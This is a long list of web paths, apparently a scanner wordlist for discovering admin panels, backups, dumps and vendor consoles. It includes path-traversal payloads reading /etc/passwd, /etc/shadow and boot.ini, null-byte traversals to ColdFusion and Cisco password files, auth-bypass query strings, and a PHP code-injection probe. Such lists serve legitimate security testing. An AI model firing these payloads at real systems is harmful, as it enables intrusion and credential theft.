/
/%2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fboot%2Eini
/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
/%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot%2Eini
/%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd
/%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd
/%2F%2Fetc%2Fpasswd
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%2fpasswd
/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini
/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\boot.ini
/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb
/..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
/../../../../../../../../../../boot.ini
/../../../../../../../../../../etc/passwd
/../../../../../../../etc/passwd
/..\\..\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini
/..\\/..\\/..\\/boot.ini
/..\\/\\..\\/\\..\\/\\boot.ini
/..\\\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini
/.bzr/README
/.bzrignore
/.git/HEAD
/.gitignore
/.hg/requires
/.hgignore
/.htaccess
/.htpasswd
/.nsf/../winnt/win.ini
/.svn/
/.svn/text-base/.htaccess.svn-base
/.svn/text-base/.htpasswd.svn-base
/.svn/text-base/Web.config.svn-base
///..%2f..%2f..%2f..%2fboot.ini
////..\\..\\..\\boot.ini
//_vti_inf.html
//cmdownloads/?CMDsearch=%22%2ebase64_decode%28%22RkVIT0tFWENETVRaWVJK%22%29%2e%22
//system.html
//user/login
/0/
/1.sql
/1/
/10/
/2/
/3/
/4/
/4dm1n/
/5/
/6/
/699817
/7/
/8/
/852566C90012664F
/9/
/AccessPlatform/auth/clientscripts/
/Adm/
/Admin/
/AdminLogin.asp
/AdminLogin.aspx
/AdminLogin.cfm
/AdminLogin.jsp
/AdminLogin.php
/Administracion/
/Administrator/
/AdvWebAdmin/
/Agent/
/Agents/
/Album/
/AlbumArt/
/AlbumArt_/
/BEEF/
/Backstage/Components/FreeTextBox/ftb.imagegallery.aspx
/BackupConfig.php
/Base/example_1.php
/Base/upload.php
/CFIDE/Administrator/startstop.html
/CFIDE/adminapi/administrator.cfc?method=login&adminpassword=&rdsPasswordAllowed=true
/CFIDE/administrator/archives/index.cfm
/CFIDE/administrator/enter.cfm
/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en
/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en
/CFIDE/administrator/entman/index.cfm
/CFIDE/componentutils/login.cfm
/CFIDE/wizards/common/_logintowizard.cfm
/CHANGELOG.txt
/CS/
/CSCOSSLC/config-auth
/CSS/Miniweb.css
/CVS/
/Citrix/
/Citrix//AccessPlatform/auth/clientscripts/cookies.js
/Citrix/AccessPlatform/auth/clientscripts/login.js
/Citrix/MetaFrame/auth/login.aspx
/Citrix/PNAgent/config.xml
/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
/DEASAppDesign.nsf
/DEASLog.nsf
/DEASLog01.nsf
/DEASLog02.nsf
/DEASLog03.nsf
/DEASLog04.nsf
/DEASLog05.nsf
/DEESAdmin.nsf
/DMR/
/Dashboard/Dashboard.html
/Default?MAIN=DEVICE
/DocuColor/
/ESAdmin/
/Examples/
/FCKEditor/editor/filemanager/browser/default/connectors/test.html
/Final/login/ava_upl.php
/Final/login/ava_upl2.php
/GXApp/
/HB/
/HBTemplates/
/HNAP1/
/HW_logo.html
/I/
/IBMWebAS/
/INSTALL.mysql.txt
/INSTALL.pgsql.txt
/INSTALL.txt
/Info.live.htm
/JBookIt/
/LightNEasy.php?do=login
/Listadeparametros.html
/Lotus_Domino_Admin/
/MAINTENERS.txt
/Manage.tri
/Manager/
/MediaWiki/
/Mediawiki/
/Msword/
/My%20Shared%20Folder/
/NETWARE.HTM
/NSearch/
/NessusClient.swf
/NetDynamic/
/NetDynamics/
/News/
/OvCgi/Toolbar.exe
/PDG_Cart/
/PHPMyAdmin/
/PMA/
/PageSelector.class
/Pages/Default.aspx
/Portal0000.htm
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
/PublishingImages/NewsArticleImage.jpg
/README
/README.txt
/Readme/
/ReqWebHelp/advanced/workingSet.jsp
/S7Web.css
/SIPsettingsLine1.html
/TopAccess/images/RioGrande/Rio_PPC.gif
/TopToolArea.html
/UPGRADE.txt
/Uploadify/
/YSHTQJRELWVIFXJR
/YUI-upload/html
/\\../\\../\\../boot.ini
/_4dm1n/
/_Admin/
/_adm1n/
/_admin/
/_admin/operations.aspx
/_administracion/
/_administrador/
/_administradores/
/_administrator/
/_administrators/
/_admins/
/_app_bin
/_controltemplates
/_layouts
/_layouts/download.aspx
/_layouts/help.aspx
/_layouts/images/helpicon.gif
/_layouts/userdisp.aspx
/_layouts/viewlsts.aspx
/_pages/
/_phpmyadmin/
/_plugin/fckeditor/editor/filemanager/connectors/test.html
/_private/
/_public/
/_sys/
/_vti_bin/
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_adm/admin.exe
/_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.exe
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/fpcount.exe?Page=default.asp|Image=3
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_cnf/
/_vti_log/
/_vti_pvt/
/_vti_pvt/Service.stp
/_vti_pvt/_x_todo.htm
/_vti_pvt/_x_todoh.htm
/_vti_pvt/access.cnf
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/botinfs.cnf
/_vti_pvt/bots.cnf
/_vti_pvt/deptodoc.btr
/_vti_pvt/doctodep.btr
/_vti_pvt/frontpg.lck
/_vti_pvt/linkinfo.cnf
/_vti_pvt/service.cnf
/_vti_pvt/service.grp
/_vti_pvt/service.lck
/_vti_pvt/service.pwd
/_vti_pvt/services.cnf
/_vti_pvt/services.org
/_vti_pvt/structure.cnf
/_vti_pvt/svcacl.cnf
/_vti_pvt/uniqueperm.cnf
/_vti_pvt/users.pwd
/_vti_pvt/writeto.cnf
/_vti_txt/
/a/
/a_domlog.nsf
/a_viewusers.php
/acceso/
/access/
/accesswatch/
/acciones/
/account.asp
/account.aspx
/account.cfm
/account.html
/account.jsp
/account.php
/account/
/accounting/
/active/
/activex/
/adm.asp
/adm.aspx
/adm.cfm
/adm.html
/adm.jsp
/adm.php
/adm/
/adm/admloginuser.asp
/adm/admloginuser.aspx
/adm/admloginuser.cfm
/adm/admloginuser.jsp
/adm/admloginuser.php
/adm/barra/assetmanager/assetmanager.php
/adm/index.asp
/adm/index.aspx
/adm/index.cfm
/adm/index.html
/adm/index.jsp
/adm/index.php
/adm1n/
/adm_auth.asp
/adm_auth.aspx
/adm_auth.cfm
/adm_auth.jsp
/adm_auth.php
/admcgi/
/admin-console/
/admin-login.asp
/admin-login.aspx
/admin-login.cfm
/admin-login.html
/admin-login.jsp
/admin-login.php
/admin.asp
/admin.aspx
/admin.cfm
/admin.html
/admin.jsp
/admin.nsf
/admin.php
/admin/
/admin/CiscoAdmin.jhtml
/admin/account.asp
/admin/account.aspx
/admin/account.cfm
/admin/account.html
/admin/account.jsp
/admin/account.php
/admin/admin-login.asp
/admin/admin-login.aspx
/admin/admin-login.cfm
/admin/admin-login.html
/admin/admin-login.jsp
/admin/admin-login.php
/admin/admin.asp
/admin/admin.aspx
/admin/admin.cfm
/admin/admin.html
/admin/admin.jsp
/admin/admin.php
/admin/admin/
/admin/adminLogin.asp
/admin/adminLogin.aspx
/admin/adminLogin.cfm
/admin/adminLogin.html
/admin/adminLogin.jsp
/admin/adminLogin.php
/admin/admin_login.asp
/admin/admin_login.aspx
/admin/admin_login.cfm
/admin/admin_login.html
/admin/admin_login.jsp
/admin/admin_login.php
/admin/backup/
/admin/controlpanel.asp
/admin/controlpanel.aspx
/admin/controlpanel.cfm
/admin/controlpanel.html
/admin/controlpanel.jsp
/admin/controlpanel.php
/admin/cp.asp
/admin/cp.aspx
/admin/cp.cfm
/admin/cp.html
/admin/cp.jsp
/admin/cp.php
/admin/download/backup.sql
/admin/environment.xml
/admin/home.asp
/admin/home.aspx
/admin/home.cfm
/admin/home.html
/admin/home.jsp
/admin/home.php
/admin/includes/FCKeditor/editor/filemanager/upload/test.html
/admin/includes/tiny_mce/plugins/tinybrowser/upload.php
/admin/index.asp
/admin/index.aspx
/admin/index.cfm
/admin/index.html
/admin/index.jsp
/admin/index.php
/admin/jscript/upload.asp
/admin/jscript/upload.html
/admin/jscript/upload.php
/admin/jscript/upload.pl
/admin/libraries/ajaxfilemanager/ajaxfilemanager.php
/admin/login.asp
/admin/login.aspx
/admin/login.cfm
/admin/login.html
/admin/login.jsp
/admin/login.php
/admin/upload.php
/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
/admin1.php
/admin108/
/admin2.asp
/admin2.aspx
/admin2.jsp
/admin2.php
/admin2/index.asp
/admin2/index.aspx
/admin2/index.cfm
/admin2/index.jsp
/admin2/index.php
/admin2/login.asp
/admin2/login.aspx
/admin2/login.cfm
/admin2/login.jsp
/admin2/login.php
/admin4.nsf
/admin5.nsf
/adminLogin.asp
/adminLogin.aspx
/adminLogin.cfm
/adminLogin.html
/adminLogin.jsp
/adminLogin.php
/adminLogin/
/admin_area/
/admin_area/admin.asp
/admin_area/admin.aspx
/admin_area/admin.cfm
/admin_area/admin.html
/admin_area/admin.jsp
/admin_area/admin.php
/admin_area/index.asp
/admin_area/index.aspx
/admin_area/index.cfm
/admin_area/index.html
/admin_area/index.jsp
/admin_area/index.php
/admin_area/login.asp
/admin_area/login.aspx
/admin_area/login.cfm
/admin_area/login.html
/admin_area/login.jsp
/admin_area/login.php
/admin_cp.asp
/admin_login.asp
/admin_login.aspx
/admin_login.cfm
/admin_login.html
/admin_login.jsp
/admin_login.php
/adminarea/
/adminarea/admin.asp
/adminarea/admin.aspx
/adminarea/admin.cfm
/adminarea/admin.html
/adminarea/admin.jsp
/adminarea/admin.php
/adminarea/index.asp
/adminarea/index.aspx
/adminarea/index.cfm
/adminarea/index.html
/adminarea/index.jsp
/adminarea/index.php
/adminarea/login.asp
/adminarea/login.aspx
/adminarea/login.cfm
/adminarea/login.html
/adminarea/login.jsp
/adminarea/login.php
/admincontrol.asp
/admincontrol.aspx
/admincontrol.cfm
/admincontrol.html
/admincontrol.jsp
/admincontrol.php
/admincontrol/login.asp
/admincontrol/login.aspx
/admincontrol/login.cfm
/admincontrol/login.html
/admincontrol/login.jsp
/admincontrol/login.php
/admincp/
/admincp/index.asp
/admincp/index.aspx
/admincp/index.cfm
/admincp/index.html
/admincp/index.jsp
/admincp/login.asp
/admincp/login.aspx
/admincp/login.cfm
/admincp/login.jsp
/admincp/login.php
/administer/
/administr8.asp
/administr8.aspx
/administr8.cfm
/administr8.jsp
/administr8.php
/administr8/
/administracao.asp
/administracao.aspx
/administracao.cfm
/administracao.jsp
/administracao.php
/administracion-sistema/
/administracion.asp
/administracion.aspx
/administracion.cfm
/administracion.jsp
/administracion.php
/administrator.asp
/administrator.aspx
/administrator.cfm
/administrator.html
/administrator.jsp
/administrator.php
/administrator/
/administrator/account.asp
/administrator/account.aspx
/administrator/account.cfm
/administrator/account.html
/administrator/account.jsp
/administrator/account.php
/administrator/index.asp
/administrator/index.aspx
/administrator/index.cfm
/administrator/index.html
/administrator/index.jsp
/administrator/index.php
/administrator/login.asp
/administrator/login.aspx
/administrator/login.cfm
/administrator/login.html
/administrator/login.jsp
/administrator/login.php
/administrator/wp-login.php
/administratorlogin.asp
/administratorlogin.aspx
/administratorlogin.cfm
/administratorlogin.jsp
/administratorlogin.php
/administratorlogin/
/administrators/
/adminpanel.asp
/adminpanel.aspx
/adminpanel.cfm
/adminpanel.html
/adminpanel.jsp
/adminpanel.php
/adminpro/
/admins.asp
/admins.aspx
/admins.cfm
/admins.jsp
/admins.php
/admins/
/admisapi/
/admloginuser.asp
/admloginuser.aspx
/admloginuser.cfm
/admloginuser.jsp
/admloginuser.php
/adr.htm
/ads/www/admin/index.php
/adserver/www/admin/index.php
/affiliate.php
/agentes/
/agentrunner.nsf
/ajaxfilemanager/
/allow/
/alog.nsf
/amember/
/analog/
/anthill/
/apache/
/aphpkb/
/app/
/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report
/appl/
/applets/
/application/
/applications/
/applmgr/
/apply/
/apps/
/appsec/
/ar/
/archiva/index.action
/archive/
/archive/flash:home/html/images/Cisco_logo.gif
/archives/
/arcsight/
/arcsight/images/logo-login-arcsight.gif
/arcsight/images/navbar-icon-logout-on.gif
/asa/
/asp/
/assetmanager/assetmanager.asp
/atc/
/atom.aspx
/atom.jsp
/atom.php
/atom.xml
/atom/
/aut/
/auth/
/authadmin/
/author/
/authors/
/aw/
/awstats/awstatstotals.php
/awstats/index.php
/awstatstotals.php
/awstatstotals/awstatstotals.php
/awstatstotals/index.php
/axis2-admin/
/axis2/
/axis2/axis2-web/HappyAxis.jsp
/axis2/services/listServices
/ayuda/
/b.sql
/b/
/b2-include/
/back/
/backend/
/backup
/backup.sql
/backup.sql.bz2
/backup.sql.gz
/backup.zip
/backup/
/backups/
/bad/
/bak/
/banca/
/banco/
/bank/
/banner/
/banner01/
/banners/
/bar/
/batch/
/bb-admin/
/bb-admin/admin.asp
/bb-admin/admin.aspx
/bb-admin/admin.cfm
/bb-admin/admin.html
/bb-admin/admin.jsp
/bb-admin/admin.php
/bb-admin/index.asp
/bb-admin/index.aspx
/bb-admin/index.cfm
/bb-admin/index.html
/bb-admin/index.jsp
/bb-admin/index.php
/bb-admin/login.asp
/bb-admin/login.aspx
/bb-admin/login.cfm
/bb-admin/login.html
/bb-admin/login.jsp
/bb-admin/login.php
/bb-dnbd/
/bbv/
/bdata/
/bdatos/
/bdb.sql
/beef/
/beef/images/beef.gif
/beta/
/billpay/
/bin/
/binaries/
/binary/
/blog/
/blog/wp-login.php
/bnnr.php
/boadmin/
/board/docs/CHANGELOG.html
/boards/docs/CHANGELOG.html
/bookmark.nsf
/boot.ini
/boot/
/bottom/
/browse/
/browser/
/browserId/wizard.jhtml
/browserId/wizardForm.jhtml
/bsc_lan.php
/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
/bsd/
/btauxdir/
/bug/
/bugs/
/bugzilla/
/busytime.nsf
/buy/
/buynow/
/c/
/cache-stats/
/cache/
/cache/backup/
/cached/
/cacti/
/caja/
/cal/cal_cat.php
/cal_cat.php
/cal_search.php
/calendar/cal_cat.php
/calendar/cal_search.php
/callme/callForm.jhtml
/card/
/cards/
/cart/
/cart/docs/
/cash/
/caspsamp/
/catalog.nsf
/catalog/
/catalog/main.php?cat_id=
/categories/SOMEOTHERDIR/allcategories.aspx
/categories/allcategories.aspx
/categories/viewcategory.aspx
/cbi-bin/
/ccard/
/ccards/
/cd-cgi/
/cd/
/cdrom/
/ce_html/
/cert/
/certa.nsf
/certificado/
/certificate/
/certlog.nsf
/certsrv.nsf
/cfappman/
/cfdocs/
/cfide/
/cfide/install.cfm
/cgi-914/
/cgi-915/
/cgi-auth/
/cgi-bin/
/cgi-bin/awstats.pl
/cgi-bin/ck/mimencode
/cgi-bin/ffileman.cgi?
/cgi-bin/image/shikaku2.png
/cgi-bin/masterCGI?
/cgi-bin/mj_wwwusr
/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/cgi-bin/vcs
/cgi-bin2/
/cgi-csc/
/cgi-exe/
/cgi-home/
/cgi-lib/
/cgi-local/
/cgi-mod/index.cgi
/cgi-mod/smtp_test.cgi
/cgi-mod/view_help.cgi
/cgi-perl/
/cgi-scripts/
/cgi-shl/
/cgi-shop/
/cgi-sys/
/cgi-weddico/
/cgi-win/
/cgi.cgi/
/cgi/
/cgibin/
/cgilib/
/cgis/
/cgiscripts/
/cgiwin/
/changelog.txt
/channel_detail.php
/chatlog.nsf
/cirronetlogo.gif
/citrix/
/citrix/AccessPlatform/auth/clientscripts/
/class/
/classes/
/clbusy.nsf
/cldbdir.nsf
/client/
/client/VMware-viclient.exe
/clientaccesspolicy.xml
/cliente/
/clientes/
/clients/
/clusta4.nsf
/cm/
/cms/
/cmsample/
/cmspages.php
/cobalt-images/
/code/
/collect4.nsf
/com/
/comic/
/comiccms/
/comments/
/common/
/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report
/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server
/common/help/en/go/login_ts.html
/common/images/logos/img_logoMain.jpg
/communicator/
/comp/
/company/
/compra/
/compras/
/compressed/
/conecta/
/conf/
/config/
/config/public/usergrp.gif
/configs/
/configure/
/confirminvite.php
/connect/
/console/
/console/login/loginForm.jsp
/console/portal/0/Welcome
/contact/
/contacts/
/content.ie5/
/content/
/controlpanel.asp
/controlpanel.aspx
/controlpanel.cfm
/controlpanel.html
/controlpanel.jsp
/controlpanel.php
/controlpanel/
/core/
/corp/
/correo/
/counter/
/cp.asp
/cp.aspx
/cp.cfm
/cp.html
/cp.jsp
/cp.php
/cpqlogin.htm?RedirectUrl=/&RedirectQueryString=
/credit/
/cron/
/crons/
/crossdomain.xml
/crypto/
/csr/
/css/
/css/cake.generic.css
/cuenta/
/cuentas/
/currency/
/cust/
/custom/
/customer/
/customers/
/cvs/
/cvsweb/
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\Program%20Files\\CSCOpx\\MDC\\Tomcat\\webapps\\triveni\\WEB-INF\\classes\\schedule.properties
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\Program%20Files\\CSCOpx\\lib\\classpath\\com\\cisco\\nm\\cmf\\dbservice2\\DBServer.properties
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\Program%20Files\\CSCOpx\\log\\dbpwdChange.log
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\boot.ini
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/cybercash/
/d/
/d41d8cd98f00b204e9800998ecf8427e.php
/da.nsf
/darkportal/
/dat/
/data.sql
/data/
/database.sql
/database/
/databases/
/databases/acidcat_3.mdb
/datafiles/
/dato/
/datos/
/db.sql
/db/
/db/users.mdb
/dba4.nsf
/dbadmin/
/dbase/
/dbbackup.txt
/dcforum/
/dclf.nsf
/ddb.sql
/ddreport/
/ddrint/
/debug.cgi
/debug.seam
/debug/
/debugs/
/decsadm.nsf
/decslog.nsf
/default/
/delete/
/deleted/
/demo/
/demoauct/
/demomall/
/demos/
/demouser/
/deny/
/deploymentmanager/
/derived/
/design/
/dev/
/devel/
/development/
/dhost/
/digg/readme.html
/dir/
/dirassist.nsf
/directories/
/directory/
/directorymanager/
/dl/
/dm-albums/dm-albums.php
/dm/
/dms/
/dms/README
/dms0/
/dmsdump/
/dnn/
/doc-html/
/doc/
/doc1/
/docs/
/docs/CHANGELOG.html
/docs/README
/docs1/
/document/
/documentation/
/documents/
/documents/README
/doladmin.nsf
/domadmin.nsf
/domcfg.nsf
/domguide.nsf
/domlog.nsf
/dotDefender/
/dotnetnuke/
/down/
/download/
/downloadFile.php
/downloads/
/dsc/
/dsp_page.cfm
/dspug.nsf
/dump.sql
/dump/
/durep/
/e/
/easylog/
/ecoder/
/editdocs.aspx
/editor/editor/filemanager/upload/test.html
/eforum/
/egroupware/
/ehcp/?op=applyforaccount
/ehcp/?op=applyfordomainaccount
/ehcp/?op=applyforftpaccount
/ejemplo/
/ejemplos/
/email/
/emailclass/
/employees/
/empoyees/
/empris/
/en/images/nav_sl_home_network_01.gif
/en/welcomeRes.js
/engine/api/api.class.php
/enter/
/envia/
/enviamail/
/error/
/errors/
/es/
/es/images/nav_sl_home_network_01.gif
/escort-profile.php
/estmt/
/etc/
/etc/passwd
/etcpasswd/
/event.nsf
/events.nsf
/events4.nsf
/events5.nsf
/example/
/examples/
/exc/
/excel/
/exchange/
/exchweb/
/exchweb/bin/auth/owalogon.asp
/exe/
/exec/
/exec/show/log/CR
/exit/
/export/
/external/
/extranet/
/eyeos/
/f/
/failure/
/fbsd/
/fcgi-bin/
/fcgi/
/fckeditor/editor/filemanager/connectors/php/config.php
/fckeditor/editor/filemanager/connectors/test.html
/fckeditor/editor/filemanager/upload/test.html
/features/
/file/
/fileadmin/
/filemanager/
/files/
/find/
/flash/
/flexfm/
/fm.php
/foldoc/
/foo/
/foobar/
/footer1.gif
/form-totaller/
/form/
/forms/
/forms/allitems.aspx
/forms/mod-view.aspx
/forms/my-sub.aspx
/forms/webfldr.aspx
/formsmgr/
/forum/
/forum/bnnr.php
/forum/docs/CHANGELOG.html
/forum_answer.php?que_id=1
/forums/
/forums/docs/CHANGELOG.html
/foto/
/fotos/
/fpadmin/
/fpclass/
/fpdb/
/fpe/
/fpsample/
/frames/
/framesets/
/frontend/x3/
/frontpage/
/fshow.php
/ftp/
/ftproot/
/fun/
/func/
/function/
/functions/
/g/
/general/
/getsimple/
/gfx/
/gfx/form_top_left_corner.gif
/gfx/logout_24.png
/gfx/new_logo.gif
/gif/
/gif/hp.gif
/gif/hp_invent_logo.gif
/gif/printer.gif
/gifs/
/global/
/globalSIPsettings.html
/globals/
/good/
/graphics/
/grocery/
/guest/
/guestbook/
/guests/
/h/
/happyaxis.jsp
/help/
/help/../../etc/shadow
/helpdesk/
/hidden/
/hide/
/hit_tracker/
/hitmatic/
/hlstats/
/home.asp
/home.aspx
/home.html
/home.jsp
/home/
/homepage.nsf
/homepage.nsf/homePage.gif?OpenImageResource
/hop.php?/12345
/host/
/hosted/
/hosting/
/hostingcontroller/
/hp/
/hp/device/this.LCDispatcher
/hp/device/webAccess/index.htm
/hplogo.gif
/hpwebjetadmin/
/ht/
/htaccess.txt
/htbin/
/htdocs/
/htm/
/html/
/html/news_fckeditor/editor/filemanager/upload/php/upload.php
/http/
/https/
/hyperstat/
/i/
/i18n/
/i18n/EN/css/foundstone.css
/i18n/EN/images/external_nav_square.gif
/iNotes/Forms5.nsf/$DefaultNav
/ibank/
/ibill/
/ibm/console/logon.jsp?action=OK
/icons/
/icons/ecblank.gif
/icons/icon_homeportal_2701XX.gif
/icons/icon_set_up_2701XX_01.gif
/idea/
/ideas/
/ie_index.htm
/iisadmin/
/iissamples/
/ilo.gif
/image/
/imagenes/
/imagery/
/images/
/images/Safeword_Token.jpg
/images/bbc__xl.gif
/images/btn_help_nml.gif
/images/ctxHeader01.jpg
/images/hdr_icon_homeG.gif
/images/icon_server_connected.gif
/images/isslogo.gif
/images/lexbold.gif
/images/lexlogo.gif
/images/logo-arcsight.gif
/images/mute_alloff.gif
/images/outlook.jpg
/images/pic_bri.gif
/images/printer.gif
/images/rails.png
/images/stxx__xl.gif
/imc/
/imcws/
/img/
/img/cake.icon.gif
/img/cake.icon.png
/imp/
/import/
/impreso/
/in/
/inc/
/include/
/includes/
/includes/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
/includes/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
/includes/FCKeditor/editor/filemanager/browser/default/connectors/cfm/connector.cfm
/includes/FCKeditor/editor/filemanager/browser/default/connectors/lasso/connector.lasso
/includes/FCKeditor/editor/filemanager/browser/default/connectors/perl/connector.cgi
/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
/includes/FCKeditor/editor/filemanager/browser/default/connectors/py/connector.py
/incoming/
/index.action
/index.html?../../../../../boot.ini
/index.html?..\\..\\..\\..\\..\\boot.ini
/index.php
/index.php?cat_id=1
/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
/index/
/inet/
/inf/
/info.php
/info/
/information/
/infusions/avatar_studio/avatar_studio.php
/ingresa/
/ingreso/
/instadmin/
/install/
/internal/
/internet/
/intranet/
/intruvert/jsp/module/Login.jsp
/inventory/
/invitado/
/invoker/
/invoker/JMXInvokerServlet
/isapi/
/j/
/j2ee/
/j2ee/examples/jsp/
/j2ee/examples/servlets/
/j2eeexamples/
/j2eeexamplesjsp/
/japidoc/
/java/
/javascript/
/javascript/sorttable.js
/javasdk/
/javatest/
/jave/
/jdbc/
/jenkins/
/jmx-console/
/job/
/joomla/
/joomla/administrator
/jotter.nsf
/jrun/
/js/
/js/vendors.php
/jsa/
/jscript/
/jserv/
/jsft_resource.jsf
/jslib/
/jsp/
/junk/
/jwsappmngr.jnlp
/k/
/kbcat.cgi
/kiva/
/known/
/kusabax/manage_page.php
/l/
/l_domlog.nsf
/labs/
/language/en-GB/en-GB.xml
/lc/system/console
/lcgi/
/leftmenubody.php
/leiadm.nsf
/leilog.nsf
/leivlt.nsf
/level/15
/level/15/exec/-
/level/15/exec/-/configure/http
/lib/
/lib/db/install.xml
/lib/thirdpartylibs.xml
/lib/usermanagement/userInfo.php
/libraries/
/library/
/libro/
/license/
/licenses/
/lime/
/limesurvey/
/line_login.htm?l=1
/links/
/linux/
/lists/
/lists/allcomments.aspx
/lists/allitems.aspx
/lists/allposts.aspx
/lists/archive.aspx
/lists/byauthor.aspx
/lists/calendar.aspx
/lists/default.aspx
/lists/mod-view.aspx
/lists/my-sub.aspx
/lists/mycomments.aspx
/lists/myposts.aspx
/lists/tasks/
/loader/
/local/
/local/readme.txt
/location/
/locations/
/log.asp
/log.aspx
/log.htm
/log.jsp
/log.nsf
/log.php
/log/
/log4a.nsf
/logfile/
/logfiles/
/logg/
/logger/
/logger/monitor.ftl
/logging/
/login.asp
/login.aspx
/login.cfm
/login.htm
/login.html
/login.jsp
/login.php
/login.stm
/login/
/login_img.jpg
/logo_t.gif
/logon/
/logout/
/logs.asp
/logs.aspx
/logs.htm
/logs.jsp
/logs.php
/logs/
/lost+found/
/m/
/mab.nsf
/mail.box
/mail/
/mail1.box
/mail10.box
/mail2.box
/mail3.box
/mail4.box
/mail5.box
/mail6.box
/mail7.box
/mail8.box
/mail9.box
/mail_log_files/
/mailman/
/mailroot/
/main_configure.cgi
/maintenance/
/majordomo/mj_wwwusr
/makefile/
/man/
/manage/
/management/
/manager/
/manager/html
/manager/html/upload
/manual/
/map/
/maps/
/marketing/
/mdb-database/dblog.mdb
/mediawiki/
/mem/
/mem_bin/
/member/
/memberadmin.asp
/memberadmin.aspx
/memberadmin.cfm
/memberadmin.jsp
/memberadmin.php
/memberadmin/
/members/
/message/
/messaging/
/metacart/
/microsoft/
/misc/
/mkstats/
/mod/
/modelsearch/admin.asp
/modelsearch/admin.aspx
/modelsearch/admin.cfm
/modelsearch/admin.html
/modelsearch/admin.jsp
/modelsearch/admin.php
/modelsearch/index.asp
/modelsearch/index.aspx
/modelsearch/index.cfm
/modelsearch/index.html
/modelsearch/index.jsp
/modelsearch/index.php
/modelsearch/login.asp
/modelsearch/login.aspx
/modelsearch/login.cfm
/modelsearch/login.html
/modelsearch/login.jsp
/modelsearch/login.php
/moderator.asp
/moderator.aspx
/moderator.cfm
/moderator.html
/moderator.jsp
/moderator.php
/moderator/
/moderator/admin.asp
/moderator/admin.aspx
/moderator/admin.cfm
/moderator/admin.html
/moderator/admin.jsp
/moderator/admin.php
/moderator/login.asp
/moderator/login.aspx
/moderator/login.cfm
/moderator/login.html
/moderator/login.jsp
/moderator/login.php
/module/
/modules/
/modules/docmanager/doctypetemplates/myuploadedfile
/mono/
/mono/1.1/index.aspx
/movimientos/
/mpcgi/
/mqseries/
/ms/
/msccallme/mscCallForm.jhtml
/msdwda.nsf
/msfpe/
/msql/
/mtatbls.nsf
/mtstore.nsf
/mxhtml/
/mxhtml/images/signin_logo.gif
/mxhtml/images/status_critical_15.gif
/mxportal/
/mxportal/home/MxPortalFrames.jsp
/mxportal/home/en_US/servicetools.gif
/my/
/myadmin/
/mycategories.aspx
/mymarket/shopping/index.php
/myshop_start.php
/mysql-admin/
/mysql.sql
/mysql/
/mysql_admin/
/mysqladmin/
/n/
/na_admin/styles/dfm.css
/nagios3/
/nagios3/cgi-bin/statuswml.cgi
/name/
